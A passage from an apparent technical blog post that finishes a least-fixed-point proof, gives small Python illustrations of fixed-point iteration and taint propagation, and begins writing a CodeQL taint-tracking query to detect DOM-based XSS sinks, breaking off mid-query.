style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" 
style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>.
<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}_n = F(\overline{X}_n)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span 
class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>, otherwise it is not the last element. Therefore it is a fixed point.</p>
<p>Now consider an arbitrary fixed point <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span>. 
In the base case, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>=</mo><mi mathvariant="normal">⊥</mi><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_0 = \bot \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8304em;vertical-align:-0.136em"></span><span class="mord">⊥</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span 
class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>. Also,</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mrow><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo stretchy="false">)</mo><mo>⊑</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo><mo>=</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\overline{X}_i \sqsubseteq \overline{Y} \implies \overline{X}_{i+1} = F(\overline{X}_i) \sqsubseteq F(\overline{Y}) = \overline{Y}
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.5433em;vertical-align:-0.5217em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.0217em"><span style="top:-3.1383em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" 
style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2083em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" 
style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" 
style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.5217em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>so by induction, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_i \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" 
style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> for all <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>0</mn><mo>≤</mo><mi>i</mi><mo>≤</mo><mi>n</mi></mrow><annotation encoding="application/x-tex">0 \leq i \leq n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7804em;vertical-align:-0.136em"></span><span class="mord">0</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7955em;vertical-align:-0.136em"></span><span class="mord mathnormal">i</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">≤</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">n</span></span></span></span>. In particular,
<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub><mo>⊑</mo><mover accent="true"><mi>Y</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}_n \sqsubseteq \overline{Y}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" 
style="margin-right:0.22222em">Y</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>, so <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span> is at least as "small" as any other fixed point, and thus the least fixed point.</p>
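<p>The argument above can be sketched in a few lines of Python. This is only a toy illustration, not how CodeQL evaluates queries: the lattice is the powerset of four made-up names ordered by inclusion, and <code>step</code>, <code>SUCCESSORS</code> and <code>least_fixed_point</code> are hypothetical names chosen for this example.</p>

```python
from typing import Callable, FrozenSet

Element = FrozenSet[str]


def least_fixed_point(f: Callable[[Element], Element], bottom: Element) -> Element:
    """Iterate X_{i+1} = F(X_i) from bottom until the chain stops growing."""
    current = bottom
    while True:
        following = f(current)
        if following == current:  # X_n = F(X_n): the last element of the chain
            return current
        current = following


# Hypothetical monotone F on the powerset of {"a", "b", "c", "d"}, ordered by
# inclusion: always include "a", and add the successors of anything present.
SUCCESSORS = {"a": {"b"}, "b": {"c"}, "c": set(), "d": {"a"}}


def step(xs: Element) -> Element:
    derived = {s for x in xs for s in SUCCESSORS[x]}
    return frozenset({"a"} | set(xs) | derived)


result = least_fixed_point(step, frozenset())
print(sorted(result))  # ['a', 'b', 'c']
```

<p>Note that the full set <code>{"a", "b", "c", "d"}</code> is also a fixed point of <code>step</code>, but the iteration from the bottom element never reaches it: it stops at the smaller one, as the proof predicts.</p>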
<h2>Writing a taint tracking query</h2>
<p>Let's walk through a CodeQL query that looks for basic DOM-based XSS vulnerabilities in a JavaScript codebase. To start, we need to define
a configuration for taint tracking:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> UnsafeDOMManipulationConfiguration</span><span style="color:#F47067"> extends</span><span style="color:#F69D50"> TaintTracking</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Configuration</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F69D50">  UnsafeDOMManipulationConfiguration</span><span style="color:#ADBAC7">() { </span><span style="color:#6CB6FF">this</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> "UnsafeDOMManipulationConfiguration"</span><span style="color:#ADBAC7"> }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Now, we need to define the sources. These are the places where untrusted data first enters the program. In this case, we're looking for
<code>RemoteFlowSource</code> (data from, e.g., a request parameter), <code>ClientRequest::Range</code> (data from an HTTP response), and <code>SomeOtherSource</code>
(a custom source that we've defined elsewhere).</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSource</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> source</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> RemoteFlowSource</span><span style="color:#F47067"> or</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ClientRequest</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Range</span><span style="color:#F47067"> or</span></span>
<span data-line=""><span style="color:#ADBAC7">  source </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> SomeOtherSource</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>These sources seed the first iteration, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi><mo stretchy="false">(</mo><mi mathvariant="normal">⊥</mi><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">F(\bot)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord">⊥</span><span class="mclose">)</span></span></span></span>, which marks every variable they taint directly. Each following iteration then marks the variables derived from
already-tainted ones, until nothing new is added.</p>
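<p>To make the iteration order concrete, here is a rough Python model of taint spreading through a tiny program. Everything in it is an assumption made for illustration: the variable names, the <code>DERIVED_FROM</code> table and the helper functions are hypothetical, and the real CodeQL engine works on a data flow graph rather than a dictionary.</p>

```python
# Hypothetical toy program: each variable maps to the variables it is computed from.
DERIVED_FROM = {
    "query": [],            # e.g. read from a request parameter (a source)
    "name": ["query"],
    "greeting": ["name"],
    "html": ["greeting", "footer"],
    "footer": [],           # a constant, never tainted
}
SOURCES = frozenset({"query"})


def taint_step(tainted: frozenset) -> frozenset:
    """One application of F: the sources, plus anything derived from a tainted variable."""
    derived = {
        var
        for var, inputs in DERIVED_FROM.items()
        if any(inp in tainted for inp in inputs)
    }
    return SOURCES | derived


def taint_iterations() -> list:
    """Return the chain F(bottom), F(F(bottom)), ... up to the fixed point."""
    chain = []
    current = frozenset()  # bottom: nothing is tainted yet
    while True:
        following = taint_step(current)
        if following == current:
            return chain
        chain.append(following)
        current = following


for i, tainted in enumerate(taint_iterations(), start=1):
    print(i, sorted(tainted))
# 1 ['query']
# 2 ['name', 'query']
# 3 ['greeting', 'name', 'query']
# 4 ['greeting', 'html', 'name', 'query']
```

<p>The first iteration contains only the source, each later one adds a layer of derived variables, and <code>footer</code> is never marked because nothing tainted flows into it.</p>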
<p>Next, we need to define the sinks. These are the places where tainted data can cause harm. Eventually, we want to find all paths from any source to any sink,
and those will be the results of our query.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390">// Sink functions from https://web.dev/articles/trusted-types</span></span>
<span data-line=""><span style="color:#F47067">override</span><span style="color:#F47067"> predicate</span><span style="color:#DCBDFB"> isSink</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">Node</span><span style="color:#F69D50"> sink</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">  // Direct assignment to innerHTML or outerHTML</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PropWrite</span><span style="color:#ADBAC7"> pw |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pw.</span><span style="color:#DCBDFB">getPropertyName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> [</span><span style="color:#96D0FF">"innerHTML"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"outerHTML"</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> pw.</span><span style="color:#DCBDFB">getRhs</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // Element.insertAdjacentHTML()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "insertAdjacentHTML"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // Direct assignment to iframe.srcdoc</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">PropWrite</span><span style="color:#ADBAC7"> pw |</span></span>
<span data-line=""><span style="color:#ADBAC7">    pw.</span><span style="color:#DCBDFB">getPropertyName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "srcdoc"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> pw.</span><span style="color:#DCBDFB">getRhs</span><span style="color:#ADBAC7">()</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // document.write() and document.writeln()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">in</span><span style="color:#ADBAC7"> [</span><span style="color:#96D0FF">"write"</span><span style="color:#ADBAC7">, </span><span style="color:#96D0FF">"writeln"</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#F69D50"> DOM</span><span style="color:#ADBAC7">::</span><span style="color:#DCBDFB">documentRef</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">and</span></span>
<span data-line=""><span style="color:#ADBAC7">    sink </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> call.</span><span style="color:#DCBDFB">getArgument</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">  )</span></span>
<span data-line=""><span style="color:#F47067">  or</span></span>
<span data-line=""><span style="color:#768390">  // DOMParser.parseFromString()</span></span>
<span data-line=""><span style="color:#F47067">  exists</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">MethodCallNode</span><span style="color:#ADBAC7"> call |</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getMethodName</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">=</span><span style="color:#96D0FF"> "parseFromString"</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">    call.</span><span style="color:#DCBDFB">getReceiver</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">getALocalSource</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> DataFlow</span><span style="color:#ADBAC7">::</span><span style="color:#F69D50">NewNode</span><span style="color:#F47067"> and</span></span>
